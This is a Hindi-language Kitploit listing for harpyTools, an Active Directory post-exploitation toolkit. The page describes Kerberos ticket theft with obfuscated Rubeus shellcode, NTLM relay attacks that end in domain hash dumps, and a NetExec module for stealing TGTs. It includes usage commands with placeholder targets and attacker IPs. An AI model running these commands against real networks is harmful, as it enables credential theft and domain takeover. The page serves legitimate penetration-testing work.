Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
harpyTools — स्वचालित सक्रिय निर्देशिका पोस्ट-एक्सप्लॉइटेशन टूलकिट जो कर्बरोस टिकट निष्कर्षण, NTLM रिले हमलों, और NetExec, Impacket और Donut एकीकरण के माध्यम से पार्श्व आवाजाही के लिए है। | Kitploit
उपकरण/GitHubGitHub/jssngc/harpytools
विशेषाधिकार वृद्धिपेलोड जनरेशनशोषणपार्श्व आंदोलनशेलकोडपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubjssngc/harpytools

harpyTools

स्वचालित सक्रिय निर्देशिका पोस्ट-एक्सप्लॉइटेशन टूलकिट जो कर्बरोस टिकट निष्कर्षण, NTLM रिले हमलों, और NetExec, Impacket और Donut एकीकरण के माध्यम से पार्श्व आवाजाही के लिए है।

1921 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

सक्रिय निर्देशिका पोस्ट-एक्सप्लॉइटेशन और रिले ऑटोमेशन उपयोगिताएँ

इस रिपॉजिटरी में Python ऑर्केस्ट्रेटर स्क्रिप्ट्स का एक संग्रह है, जो Active Directory वातावरण में सुरक्षा मूल्यांकन और पेनिट्रेशन परीक्षण के लिए डिज़ाइन की गई हैं। ये उपकरण विशेष रूप से पोस्ट-एक्सप्लॉइटेशन परिदृश्यों के लिए इंजीनियर किए गए हैं, जहां समझौता किए गए वर्कस्टेशन या सर्वर पर स्थानीय प्रशासनिक पहुंच पहले से स्थापित हो चुकी है, और लक्ष्य व्यापक Active Directory डोमेन की ओर पार्श्व आवागमन या विशेषाधिकार वृद्धि करना है।

NetExec, Impacket, Donut, और BloodyAD जैसी सामान्य सुरक्षा उपयोगिताओं से जुड़े वर्कफ़्लो को स्वचालित करके, ये स्क्रिप्ट जटिल बहु-चरणीय प्रक्रियाओं को दोहराने योग्य, एकल-कमांड संचालन में सरल बनाती हैं।

पूर्वापेक्षाएँ

स्क्रिप्ट्स को होस्ट सिस्टम पर निम्नलिखित टूल्स स्थापित होने चाहिए और सिस्टम के PATH में उपलब्ध होने चाहिए:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (शेलकोड जनरेटर)
  • Myph (बाइनरी कंपाइलर/ऑबफ़सकेटर)
  • BloodyAD (Active Directory प्रशासन उपकरण)
  • मानक Linux उपयोगिताएँ: awk, base64

वैकल्पिक Python निर्भरताएँ

बेहतर कंसोल आउटपुट स्वरूपण के लिए, निम्नलिखित पैकेज स्थापित करें:

root@kitploit:~
pip install colorama rich

घटक अवलोकन

1. TGT निष्कर्षण ऑर्केस्ट्रेटर (harpyTGT.py)

यह स्क्रिप्ट किसी लॉग-इन Windows सत्र से Kerberos टिकट ग्रांटिंग टिकट (TGT) के निष्कर्षण को स्वचालित करती है और इसे Linux-संगत ccache प्रारूप में परिवर्तित करती है।

  • परिदृश्य: जब किसी मशीन पर स्थानीय प्रशासक पहुंच प्राप्त हो जाती है, तो यह उपकरण ऑपरेटरों को उस होस्ट पर सक्रिय डोमेन उपयोगकर्ताओं के Kerberos टिकटों की कटाई करने की अनुमति देता है, जिससे उनके सादे पाठ पासवर्ड जाने बिना पार्श्व आवागमन संभव होता है।
  • तंत्र: Donut के माध्यम से एक Rubeus.exe शेलकोड पेलोड उत्पन्न करता है, Myph का उपयोग करके ऑबफ़स्केशन लागू करता है, और परिणामी बाइनरी को लक्ष्य होस्ट पर निर्धारित कार्यों (schtask_as) या mmcexec का उपयोग करके निष्पादित करता है।

मानक निष्पादन (लक्ष्य उपयोगकर्ता के पास प्रशासनिक विशेषाधिकार हैं):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

वैकल्पिक निष्पादन (लक्ष्य उपयोगकर्ता के पास प्रशासनिक विशेषाधिकार नहीं हैं):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

2. NTLM रिले ऑटोमेशन (harpyRelay.py)

यह स्क्रिप्ट डोमेन नियंत्रकों पर गलत-कॉन्फ़िगर की गई SMB या LDAP साइनिंग नीतियों को लक्षित करने वाले NTLM रिले हमलों का समन्वय करती है, ताकि डोमेन-व्यापी विशेषाधिकार वृद्धि प्राप्त की जा सके या NTDS डेटाबेस डंप (DCSync) किया जा सके।

  • परिदृश्य: समझौता किए गए होस्ट पर मौजूदा स्थानीय प्रशासक विशेषाधिकारों का उपयोग करके, स्क्रिप्ट एक उच्च-विशेषाधिकार प्रक्रिया (जैसे डोमेन व्यवस्थापक सत्र) को हमलावर के पास वापस प्रमाणित करने के लिए मजबूर करती है, उन क्रेडेंशियल्स को LDAP/LDAPS के माध्यम से पूरे डोमेन से समझौता करने के लिए डोमेन नियंत्रक को रिले करती है।
  • तंत्र: एक ntlmrelayx श्रोता उत्पन्न करता है, NetExec के माध्यम से समझौता किए गए क्लाइंट से एक प्रमाणीकरण अनुरोध ट्रिगर करता है, सफल शोषण के लिए आउटपुट की निगरानी करता है, और डोमेन हैश डंप करता है। उपकरण में लक्ष्य डोमेन पर पदचिह्न को कम करने के लिए स्वचालित सफाई रूटीन शामिल हैं।

LDAPS प्रवाह (मानक):

root@kitploit:~
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

LDAP प्रवाह (वैकल्पिक प्रवाह जब LDAPS उपलब्ध नहीं है):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. NetExec मॉड्यूल: stealTGT

NetExec (nxc) के लिए एक कस्टम मॉड्यूल, जो लक्ष्य मशीन पर किसी विशिष्ट लॉग-ऑन उपयोगकर्ता से Kerberos टिकट ग्रांटिंग टिकट (TGT) निकालने के लिए डिज़ाइन किया गया है।

मॉड्यूल mmcexec के माध्यम से SYSTEM के रूप में इंटरैक्ट करता है, एक चोरी-छिपे पेलोड (Rubeus को Donut और Myph के साथ एन्कैप्सुलेट करना) उत्पन्न करने, इसे मेमोरी में निष्पादित करने, Base64 टिकट आउटपुट को कैप्चर करने, और इसे Linux में उपयोग के लिए तैयार .ccache फ़ाइल में पारदर्शी रूप से परिवर्तित करने को स्वचालित करता है।

हमलावर होस्ट (Kali Linux) पर पूर्वापेक्षाएँ

मॉड्यूल स्वचालित रूप से जांचता है कि निम्नलिखित उपयोगिताएँ स्थापित हैं और आपके $PATH में उपलब्ध हैं:

  • donut
  • myph
  • impacket-ticketConverter

मॉड्यूल स्थापना

बाहरी मॉड्यूल को NetExec में लोड करने के लिए, stealTGT.py स्क्रिप्ट को अपनी स्थानीय NetExec मॉड्यूल निर्देशिका में कॉपी करें:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

उपयोग और सिंटैक्स

root@kitploit:~
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe

मॉड्यूल विकल्प (-o):

  • USER: वर्तमान में लॉग-ऑन सत्र का उपयोगकर्ता नाम जिससे आप TGT काटना चाहते हैं (जैसे, jdoe)।
  • RUBEUS: आपकी हमलावर मशीन पर स्थानीय पथ जहां वैध Rubeus.exe बाइनरी स्थित है।

परिचालन सुविधाएँ

  • स्वचालित वातावरण सफाई: रिले उपयोगिता निष्पादन के दौरान बनाए गए अस्थायी खातों को ट्रैक करती है और संचालन समाप्त होने पर bloodyad या netexec के माध्यम से स्वचालित रूप से हटाने का प्रयास करती है।
  • गैर-TLS वातावरण का प्रबंधन: उन वातावरणों के लिए स्पष्ट फ़ॉलबैक शामिल करता है जहां डोमेन नियंत्रक LDAP over TLS (LDAPS) का समर्थन नहीं करते हैं।

अस्वीकरण

महत्वपूर्ण सूचना: यह रिपॉजिटरी केवल अधिकृत सुरक्षा ऑडिटिंग, भेद्यता अनुसंधान और शैक्षिक उद्देश्यों के लिए है। सिस्टम मालिकों से पूर्व स्पष्ट, लिखित प्राधिकरण के बिना उत्पादन बुनियादी ढांचे के विरुद्ध इन उपकरणों को चलाना सख्त वर्जित है। लेखक इस सॉफ़्टवेयर की तैनाती से उत्पन्न दुरुपयोग, आकस्मिक क्षति या कानूनी परिणामों के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें